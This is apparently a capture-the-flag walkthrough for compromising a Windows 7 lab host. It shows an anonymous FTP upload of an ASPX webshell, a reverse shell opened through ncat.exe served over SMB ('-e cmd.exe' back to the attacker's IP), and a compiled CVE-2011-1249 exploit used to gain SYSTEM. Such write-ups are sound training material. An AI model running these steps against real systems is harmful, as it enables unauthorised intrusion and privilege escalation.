Recon & Initial foothold :
We start with running nmap or my preferred method of using AutoRecon to save us some time.
From a quick glance GoBuster wasn’t able to run, so that may be worth re-running manually. For now we can see that there are two ports open, 21 and 80. This tells us that the host has FTP and HTTP servers running.
Let’s see what’s running on port 80 first. (AutoRecon also takes a screenshot for us, this can be found in the scans directory it creates)
Let’s check out port 21 now, from the nmap scan results we can see that Anonymous login is allowed. The real question now is can we upload/download data as an Anonymous user?
The file we uploaded is a ASPX webshell that is included with Kali at /usr/share/webshells/aspx/cmdasp.aspx
Let’s see what happens when we navigate to /cmdasp.aspx
Pivot from webshell :
We’re going to access nc.exe over SMB from this webshell so we can grab a proper reverse shell. To do so we’ll go the easy route and use
smbserver.py from the Impacket project. I use
pipx to manage my Python modules, so in my case I just need to run the following:
sudo smbserver.py <SHARE_NAME> <path to dir with ncat.exe>
Now that we have our SMB server up, let’s use ncat.exe to spawn a shell. First start a listening on your Kali box with the tried and true,
nc -lvnp <PORT>, and from the webshell we run the following:
\\<KALI_IP>\<SHARE_NAME>\ncat.exe -e cmd.exe <KALI_IP> <PORT>
Let’s find out some more info about the host and see what users exist.
What we’ve learned here is that this is a 32-bit Windows 7 system that appears to have no patches installed.
Sadly we can’t access the Administrator or babis user directories, so we’ll have to escalate our privilege to explore more.
Privilege Escalation :
For this host let’s save the output of
systeminfo to a text file on our Kali box and then run WES-NG on that output to find some vulnerabilities we can exploit.
I ran the following to output the findings into a text file I can refer back to without having to scroll around my terminal
python wes.py <PATH_TO_SYSTEMINFO_FILE> > <OUTPUT_FOLDER_AND_FILE_NAME>
In the case of this host, we’re given a file with ~2500 lines, so we can search for privilege escalation vulns and do some research on them. There are multiple ways to escalate, however I liked the simplicity of CVE-2011–1249 here.
Back on the Kali box we’ll need to install a new tool, mingw-w64, run the following:
sudo apt install mingw-w64
Then download this exploit code or use searchsploit to make a local copy.
Next, in the directory with the exploit code run the following to create an executable file
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32
You know the drill by now, we’re going to run this executable from our SMB share and get system privilege in one fell swoop.
Get the flags :
From here we can visit both the Administrator and babis user directories and grab the flags.